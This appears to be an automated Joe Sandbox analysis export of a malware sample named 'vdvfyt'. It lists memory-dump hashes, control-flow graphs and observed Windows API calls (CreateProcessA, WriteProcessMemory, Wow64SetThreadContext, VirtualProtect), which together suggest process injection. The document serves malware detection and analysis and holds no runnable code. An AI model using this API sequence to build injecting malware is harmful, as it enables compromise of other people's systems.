                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1eb45f298064f58d0900959c12848bb1f5a917e766e2b174a4bf9ca69d400f69
                                                                                    • Instruction ID: 1f1b7555e67ab059ac34cbdfdd34edc6b928fe9a86428f4da73cd701062a0044
                                                                                    • Opcode Fuzzy Hash: 1eb45f298064f58d0900959c12848bb1f5a917e766e2b174a4bf9ca69d400f69
                                                                                    • Instruction Fuzzy Hash: 7F223974B10215CFDB54DF28C484A6EB7F2BF88715B1684AAEA06DB361DB31EC41CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 85021c627bf02a38d7b1418ed52057beec3b095f1cc2e2b47b3946d1deb82502
                                                                                    • Instruction ID: 03406a222fde0a0a156af7a0e8a0cc5bf19920325ed57e9a1f43693af34c3114
                                                                                    • Opcode Fuzzy Hash: 85021c627bf02a38d7b1418ed52057beec3b095f1cc2e2b47b3946d1deb82502
                                                                                    • Instruction Fuzzy Hash: E1122170E54218CFEB65DF69C844BAEB7F2BB89304F1181AAD909E7249DB309D81CF51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3b5dc14aa8000f842eb2307b088ff80aa25a6af4a72442341be5d10ff746f521
                                                                                    • Instruction ID: 54ef9f88869b5a3efdf1e82377967d87fd1644f0cb77881eaba23468ba41531b
                                                                                    • Opcode Fuzzy Hash: 3b5dc14aa8000f842eb2307b088ff80aa25a6af4a72442341be5d10ff746f521
                                                                                    • Instruction Fuzzy Hash: 99121270E14218CFEB65DF69C844BADB7F2BB89304F1181AAD909E7249DB709E81CF51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1b966844aafbe595abf56add576a37e5ced69557818b8caa91104151ae2e96e0
                                                                                    • Instruction ID: d3ad8bd0ce9821bb77551d61ae292dc08e5785c390ba5a59da13c32258d7bb91
                                                                                    • Opcode Fuzzy Hash: 1b966844aafbe595abf56add576a37e5ced69557818b8caa91104151ae2e96e0
                                                                                    • Instruction Fuzzy Hash: 54122170A54218CFEB61DF69C844BADB7F2BB89304F5181AAD909E7349DB309E81CF51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fd63b0e42a276af3ee543787ac5239c79d9986f70d782408d7fb5f03c01341d1
                                                                                    • Instruction ID: dd76138cadd57d71a4024450846bd4d6dba79579471d5f4ddef473fc60ebdc16
                                                                                    • Opcode Fuzzy Hash: fd63b0e42a276af3ee543787ac5239c79d9986f70d782408d7fb5f03c01341d1
                                                                                    • Instruction Fuzzy Hash: C5022270A54218CFEB61DF69C844BADB7F2BB88304F5181AAD909E7349DB309E81CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853689131.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6860000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b9b332efdf742d872cff7d7a83501d08ae598c05b21a2b9ac536b3cd401e07b2
                                                                                    • Instruction ID: 86eafedbe2a4d5f33ec3ed9c2a7d4a986e03505b0b2d3e75b9210a4b56578e65
                                                                                    • Opcode Fuzzy Hash: b9b332efdf742d872cff7d7a83501d08ae598c05b21a2b9ac536b3cd401e07b2
                                                                                    • Instruction Fuzzy Hash: 53B1F4B0E05218CFEB94CF6AD994BADBBF2BB89304F1090A9E10DE7255DB705981CF51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853689131.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6860000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b879a7a0503084caad21e37929c23b2c2994ceaf10ad9637daf85655f4587d54
                                                                                    • Instruction ID: 19dc85ece3b97fe18707e31d819be9b90fa5fc5a3986ae185f2b76174f32df2a
                                                                                    • Opcode Fuzzy Hash: b879a7a0503084caad21e37929c23b2c2994ceaf10ad9637daf85655f4587d54
                                                                                    • Instruction Fuzzy Hash: A2B117B0E05218CFDB64CF6AD988B9DBBF2BF89304F1091AAE109E7255DB705985CF11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853689131.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6860000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 796cbd3489a275fe5c02f4efa110632623ec167cf7d2f409ca5de7c41b682ddc
                                                                                    • Instruction ID: a21c6bbb3733b77f295d0d27781035f8a35285804bf284ad8e3159386177f6cd
                                                                                    • Opcode Fuzzy Hash: 796cbd3489a275fe5c02f4efa110632623ec167cf7d2f409ca5de7c41b682ddc
                                                                                    • Instruction Fuzzy Hash: 4CA1F5B0E41208CFDB54CFAAD988B9DBBF2BF49304F1091A9E109E7265DB709981CF11

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 26 6861a7f-6861a9e call 6cea2d8 28 6861aa3-6861ada call 6861100 26->28 31 68612a7-68612af 28->31 32 6861ae0-6861ae8 28->32 33 68612b1-686150e call 6861100 31->33 34 68612b8-6862091 31->34 32->31 33->31 40 6861514-686151c 33->40 34->31 40->31
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853689131.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6860000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 1$t
                                                                                    • API String ID: 0-2087191094
                                                                                    • Opcode ID: 77a444a2aa72b86e8f454c6a9b95101faea14377fc980a379ea8e446a4095c45
                                                                                    • Instruction ID: db6bb3813ae9dcb324205fe7a8d37bcdf76eacdf9322c93d8e9b7f90559c461b
                                                                                    • Opcode Fuzzy Hash: 77a444a2aa72b86e8f454c6a9b95101faea14377fc980a379ea8e446a4095c45
                                                                                    • Instruction Fuzzy Hash: FDF0CF70D142A9CFDBA1CF29D898B9CBBB5BB09200F0006EAE448E3242DB704E818F05

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 790 227b3b7-227b3d7 791 227b403-227b407 790->791 792 227b3d9-227b3e6 call 2279684 790->792 793 227b41b-227b45c 791->793 794 227b409-227b413 791->794 799 227b3fc 792->799 800 227b3e8 792->800 801 227b45e-227b466 793->801 802 227b469-227b477 793->802 794->793 799->791 846 227b3ee call 227b660 800->846 847 227b3ee call 227b650 800->847 801->802 803 227b49b-227b49d 802->803 804 227b479-227b47e 802->804 807 227b4a0-227b4a7 803->807 808 227b480-227b487 call 227a714 804->808 809 227b489 804->809 805 227b3f4-227b3f6 805->799 806 227b538-227b5f8 805->806 840 227b600-227b62b GetModuleHandleW 806->840 841 227b5fa-227b5fd 806->841 811 227b4b4-227b4bb 807->811 812 227b4a9-227b4b1 807->812 810 227b48b-227b499 808->810 809->810 810->807 814 227b4bd-227b4c5 811->814 815 227b4c8-227b4d1 call 227a724 811->815 812->811 814->815 821 227b4d3-227b4db 815->821 822 227b4de-227b4e3 815->822 821->822 823 227b4e5-227b4ec 822->823 824 227b501-227b508 call 227b960 822->824 823->824 826 227b4ee-227b4fe call 227a734 call 227a744 823->826 827 227b50b-227b50e 824->827 826->824 830 227b531-227b537 827->830 831 227b510-227b52e 827->831 831->830 842 227b634-227b648 840->842 843 227b62d-227b633 840->843 841->840 843->842 846->805 847->805
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0227B61E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2831922422.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2270000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 1f19d1ba70aaf48ca5c0fb1535416b971e8224d2b318ccd9e17bfe44d71b0f4b
                                                                                    • Instruction ID: ac22714374381835846ad1ddcb43244b764edde6d8a1e78e1eb862109ec930e8
                                                                                    • Opcode Fuzzy Hash: 1f19d1ba70aaf48ca5c0fb1535416b971e8224d2b318ccd9e17bfe44d71b0f4b
                                                                                    • Instruction Fuzzy Hash: EE815470A14B068FD724DF6AD45579ABBF1FF88308F008A2DD48ADBA44D734E946CB91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 848 5b9f8c4-5b9f940 851 5b9f979-5b9f999 848->851 852 5b9f942-5b9f94c 848->852 859 5b9f99b-5b9f9a5 851->859 860 5b9f9d2-5b9fa0c 851->860 852->851 853 5b9f94e-5b9f950 852->853 854 5b9f973-5b9f976 853->854 855 5b9f952-5b9f95c 853->855 854->851 857 5b9f95e 855->857 858 5b9f960-5b9f96f 855->858 857->858 858->858 861 5b9f971 858->861 859->860 862 5b9f9a7-5b9f9a9 859->862 866 5b9fa0e-5b9fa18 860->866 867 5b9fa45-5b9faba CreateProcessA 860->867 861->854 864 5b9f9ab-5b9f9b5 862->864 865 5b9f9cc-5b9f9cf 862->865 868 5b9f9b9-5b9f9c8 864->868 869 5b9f9b7 864->869 865->860 866->867 870 5b9fa1a-5b9fa1c 866->870 879 5b9fabc-5b9fac2 867->879 880 5b9fac3-5b9fb0b 867->880 868->868 871 5b9f9ca 868->871 869->868 872 5b9fa3f-5b9fa42 870->872 873 5b9fa1e-5b9fa28 870->873 871->865 872->867 875 5b9fa2a 873->875 876 5b9fa2c-5b9fa3b 873->876 875->876 876->876 877 5b9fa3d 876->877 877->872 879->880 885 5b9fb1b-5b9fb1f 880->885 886 5b9fb0d-5b9fb11 880->886 888 5b9fb2f-5b9fb33 885->888 889 5b9fb21-5b9fb25 885->889 886->885 887 5b9fb13 886->887 887->885 890 5b9fb43 888->890 891 5b9fb35-5b9fb39 888->891 889->888 892 5b9fb27 889->892 894 5b9fb44 890->894 891->890 893 5b9fb3b 891->893 892->888 893->890 894->894
                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05B9FAAA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851242156.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b90000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: e85ebcd9a45dc6281ad49a9ddad3b20663c5a049df79ab9d236338670b98aaa6
                                                                                    • Instruction ID: e018ec77f5ef96154556feefba6a78ae3e2016b2276f07365ff2b467dda92693
                                                                                    • Opcode Fuzzy Hash: e85ebcd9a45dc6281ad49a9ddad3b20663c5a049df79ab9d236338670b98aaa6
                                                                                    • Instruction Fuzzy Hash: BC811571D1021A9FDF15CFA9C8857AEBBF2FB48320F148569E855E7250EB74A8818F81

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 895 5b9f8d0-5b9f940 897 5b9f979-5b9f999 895->897 898 5b9f942-5b9f94c 895->898 905 5b9f99b-5b9f9a5 897->905 906 5b9f9d2-5b9fa0c 897->906 898->897 899 5b9f94e-5b9f950 898->899 900 5b9f973-5b9f976 899->900 901 5b9f952-5b9f95c 899->901 900->897 903 5b9f95e 901->903 904 5b9f960-5b9f96f 901->904 903->904 904->904 907 5b9f971 904->907 905->906 908 5b9f9a7-5b9f9a9 905->908 912 5b9fa0e-5b9fa18 906->912 913 5b9fa45-5b9faba CreateProcessA 906->913 907->900 910 5b9f9ab-5b9f9b5 908->910 911 5b9f9cc-5b9f9cf 908->911 914 5b9f9b9-5b9f9c8 910->914 915 5b9f9b7 910->915 911->906 912->913 916 5b9fa1a-5b9fa1c 912->916 925 5b9fabc-5b9fac2 913->925 926 5b9fac3-5b9fb0b 913->926 914->914 917 5b9f9ca 914->917 915->914 918 5b9fa3f-5b9fa42 916->918 919 5b9fa1e-5b9fa28 916->919 917->911 918->913 921 5b9fa2a 919->921 922 5b9fa2c-5b9fa3b 919->922 921->922 922->922 923 5b9fa3d 922->923 923->918 925->926 931 5b9fb1b-5b9fb1f 926->931 932 5b9fb0d-5b9fb11 926->932 934 5b9fb2f-5b9fb33 931->934 935 5b9fb21-5b9fb25 931->935 932->931 933 5b9fb13 932->933 933->931 936 5b9fb43 934->936 937 5b9fb35-5b9fb39 934->937 935->934 938 5b9fb27 935->938 940 5b9fb44 936->940 937->936 939 5b9fb3b 937->939 938->934 939->936 940->940
                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05B9FAAA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851242156.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b90000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: f82319f15506dcf95af43f5b503d7de6d5e581ae7f1ff3328f9ddf9063c937f2
                                                                                    • Instruction ID: f7ec302b3f4f32dbe07207da6e8ee7e070051f2668d2a92b1e61a12f698d9db9
                                                                                    • Opcode Fuzzy Hash: f82319f15506dcf95af43f5b503d7de6d5e581ae7f1ff3328f9ddf9063c937f2
                                                                                    • Instruction Fuzzy Hash: 2D812471D0031A9FDF15CFA9C8857AEBBF2FF48320F148569E855E7250EB74A8818B81

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 941 685a080-685a092 942 685a094-685a0b5 941->942 943 685a0bc-685a0c0 941->943 942->943 944 685a0c2-685a0c4 943->944 945 685a0cc-685a0db 943->945 944->945 946 685a0e7-685a113 945->946 947 685a0dd 945->947 951 685a340-685a387 946->951 952 685a119-685a11f 946->952 947->946 983 685a39d-685a3a9 951->983 984 685a389 951->984 953 685a125-685a12b 952->953 954 685a1f1-685a1f5 952->954 953->951 956 685a131-685a13e 953->956 957 685a1f7-685a200 954->957 958 685a218-685a221 954->958 960 685a144-685a14d 956->960 961 685a1d0-685a1d9 956->961 957->951 962 685a206-685a216 957->962 963 685a246-685a249 958->963 964 685a223-685a243 958->964 960->951 968 685a153-685a16b 960->968 961->951 967 685a1df-685a1eb 961->967 966 685a24c-685a252 962->966 963->966 964->963 966->951 969 685a258-685a26b 966->969 967->953 967->954 970 685a177-685a189 968->970 971 685a16d 968->971 969->951 974 685a271-685a281 969->974 970->961 978 685a18b-685a191 970->978 971->970 974->951 976 685a287-685a294 974->976 976->951 980 685a29a-685a2af 976->980 981 685a193 978->981 982 685a19d-685a1a3 978->982 980->951 992 685a2b5-685a2d8 980->992 981->982 982->951 985 685a1a9-685a1cd 982->985 988 685a3b5-685a3d1 983->988 989 685a3ab 983->989 986 685a38c-685a38e 984->986 990 685a390-685a39b 986->990 991 685a3d2-685a3ff call 68558f0 986->991 989->988 990->983 990->986 1006 685a417-685a419 991->1006 1007 685a401-685a407 991->1007 992->951 998 685a2da-685a2e5 992->998 1000 685a2e7-685a2f1 998->1000 1001 685a336-685a33d 998->1001 1000->1001 1005 685a2f3-685a309 1000->1005 1012 685a315-685a32e 1005->1012 1013 685a30b 1005->1013 1028 685a41b call 685b62f 1006->1028 1029 685a41b call 685a488 1006->1029 1030 685a41b call 685a498 1006->1030 1008 685a409 1007->1008 1009 685a40b-685a40d 1007->1009 1008->1006 1009->1006 1011 685a421-685a425 1014 685a427-685a43e 1011->1014 1015 685a470-685a480 1011->1015 1012->1001 1013->1012 1014->1015 1021 685a440-685a44a 1014->1021 1023 685a45d-685a46d 1021->1023 1024 685a44c-685a45b 1021->1024 1024->1023 1028->1011 1029->1011 1030->1011
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: d
                                                                                    • API String ID: 0-2564639436
                                                                                    • Opcode ID: ad659edc1efc8f4ad1131856d4b0d4f07d50a8241ac169795135495aa3b56aed
                                                                                    • Instruction ID: 2b5ae3a193eafa202238b7ed2d68dc32a44cf24813b51a997c2e86c0ec1f4b34
                                                                                    • Opcode Fuzzy Hash: ad659edc1efc8f4ad1131856d4b0d4f07d50a8241ac169795135495aa3b56aed
                                                                                    • Instruction Fuzzy Hash: BFD14734700606CFC768DF28C58496EB7F2FF89714B168A69D95ACB661DB30F846CB90

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1031 5b803ea-5b8043e 1033 5b8044e-5b8048d WriteProcessMemory 1031->1033 1034 5b80440-5b8044c 1031->1034 1036 5b8048f-5b80495 1033->1036 1037 5b80496-5b804c6 1033->1037 1034->1033 1036->1037
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05B80480
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851196377.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b80000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: ed6b24409358e709e51f1342eb42b95a5aa9182ea2c54ac727465c35ff630e78
                                                                                    • Instruction ID: 593c2662b43f314132c8ee123f8f2133d381b333c68964abd9ab638a085482ca
                                                                                    • Opcode Fuzzy Hash: ed6b24409358e709e51f1342eb42b95a5aa9182ea2c54ac727465c35ff630e78
                                                                                    • Instruction Fuzzy Hash: D92128719003499FDB10DFA9C8857EEBBF1FF48314F14842AE559A7240C7789554DB60

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1041 5b803f0-5b8043e 1043 5b8044e-5b8048d WriteProcessMemory 1041->1043 1044 5b80440-5b8044c 1041->1044 1046 5b8048f-5b80495 1043->1046 1047 5b80496-5b804c6 1043->1047 1044->1043 1046->1047
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05B80480
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2851196377.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5b80000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: acc0ad60ea198e63e958dc1fa01415809590945595a557ca109055a556692899
                                                                                    • Instruction ID: 7688f1898e2dc33c8d5af86b07c27293f7e9388aae816ca9b764aaedc493acbf
                                                                                    • Opcode Fuzzy Hash: acc0ad60ea198e63e958dc1fa01415809590945595a557ca109055a556692899
                                                                                    • Instruction Fuzzy Hash: C02126719003099FDB10DFAAC885BEEBBF5FF48310F14842AE959A7240C779A954DBA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1051 227bda0-227dd3c DuplicateHandle 1053 227dd45-227dd62 1051->1053 1054 227dd3e-227dd44 1051->1054 1054->1053
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0227DC6E,?,?,?,?,?), ref: 0227DD2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2831922422.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2270000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: c0c0b8bbb06d589262b52e759c2b3130262a8d044d61e6196fae1808b65f1bc7
                                                                                    • Instruction ID: 46d5605aeff970174c615d5f24653e91037502c680cc56e701bd2c5397958c38
                                                                                    • Opcode Fuzzy Hash: c0c0b8bbb06d589262b52e759c2b3130262a8d044d61e6196fae1808b65f1bc7
                                                                                    • Instruction Fuzzy Hash: AB21E4B59103099FDB10CFAAD984ADEBBF8FF48310F14841AE914A7350D374A950CFA4

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1073 69bdae1-69bdb69 VirtualProtect 1076 69bdb6b-69bdb71 1073->1076 1077 69bdb72-69bdba2 1073->1077 1076->1077
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 069BDB5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853893519.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_69b0000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 54b8332c9057f581acd8ac764702432e17e47e954eebe44368103857ea54180d
                                                                                    • Instruction ID: 9910b060b41c478ad01e011dcc23995cbe6c93016ec165bf15e7ab6221d77255
                                                                                    • Opcode Fuzzy Hash: 54b8332c9057f581acd8ac764702432e17e47e954eebe44368103857ea54180d
                                                                                    • Instruction Fuzzy Hash: 022107758003099FDB10DFAAC845BEEBBF5AF88320F14842AD459A7640C7799945DFA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1081 6cefcd0-6cefd1b 1083 6cefd1d-6cefd29 1081->1083 1084 6cefd2b-6cefd5b Wow64SetThreadContext 1081->1084 1083->1084 1086 6cefd5d-6cefd63 1084->1086 1087 6cefd64-6cefd94 1084->1087 1086->1087
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CEFD4E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2854174725.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6cd0000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: cd9230874c2b2b44120cdb394885fe516d5a31e261709e856aff0b6270110052
                                                                                    • Instruction ID: 79e75b89f257b48782ea6f7e9e63c1017064f267bbc99486f4038482604ae8a7
                                                                                    • Opcode Fuzzy Hash: cd9230874c2b2b44120cdb394885fe516d5a31e261709e856aff0b6270110052
                                                                                    • Instruction Fuzzy Hash: B7212975D003098FDB10DFAAC4857EEBBF4EF88214F14842ED559A7240DB789A45CFA4
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 069BDB5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853893519.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_69b0000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: e3bd1682b877b8facddae71a4742bd39f3f648a2c63d8b69665fa7fe58aace43
                                                                                    • Instruction ID: 20f7bdf626e0116805317fc525be235655f7c49d1817bd4f4d1cba26edad4aad
                                                                                    • Opcode Fuzzy Hash: e3bd1682b877b8facddae71a4742bd39f3f648a2c63d8b69665fa7fe58aace43
                                                                                    • Instruction Fuzzy Hash: 352115718003098FDB10DFAAC845BEEBBF5EF88320F14842AD459A7240CB799945DFA0
                                                                                    APIs
                                                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 06A7D8EC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2854065027.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6a70000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 96a8dad34426d38b60b432a5958f61fcac6169ae20690408f183d0f597923c6b
                                                                                    • Instruction ID: 842aaf96399ea96749f2858fb9bc90bfcbe99819382bd31624a3707c5ac1adee
                                                                                    • Opcode Fuzzy Hash: 96a8dad34426d38b60b432a5958f61fcac6169ae20690408f183d0f597923c6b
                                                                                    • Instruction Fuzzy Hash: 0B11F4B1D003099FDB10EFAAC885B9EFBF5AF88620F14842AD419A7240C7759945CFA0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853893519.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_69b0000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: b5a8b701db6db1db8e94d5cd1da7496b4d727330379639c3dc3b0c7c4c4c17d6
                                                                                    • Instruction ID: d065535438e16aba880c0b913791e76562dd64ab2a70a15515fcb7806c437361
                                                                                    • Opcode Fuzzy Hash: b5a8b701db6db1db8e94d5cd1da7496b4d727330379639c3dc3b0c7c4c4c17d6
                                                                                    • Instruction Fuzzy Hash: C11149719003498FDB10DFAAC8457EEFBF9AF88620F14841AD555A7240CB799944CFA4
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853893519.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_69b0000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: bd9cbb39a08578e04a31914a10dd54c51ee76af1f5962f3002899382c48db3e6
                                                                                    • Instruction ID: 6c1e9da6d9465e513fda773ba45d968f4cb598a234c0d9ec1288fa952b8a416c
                                                                                    • Opcode Fuzzy Hash: bd9cbb39a08578e04a31914a10dd54c51ee76af1f5962f3002899382c48db3e6
                                                                                    • Instruction Fuzzy Hash: 71115BB5D003098FDB10DFAAC9847EEFBF5AF88320F14881AD455A7640CB799945CFA4
                                                                                    APIs
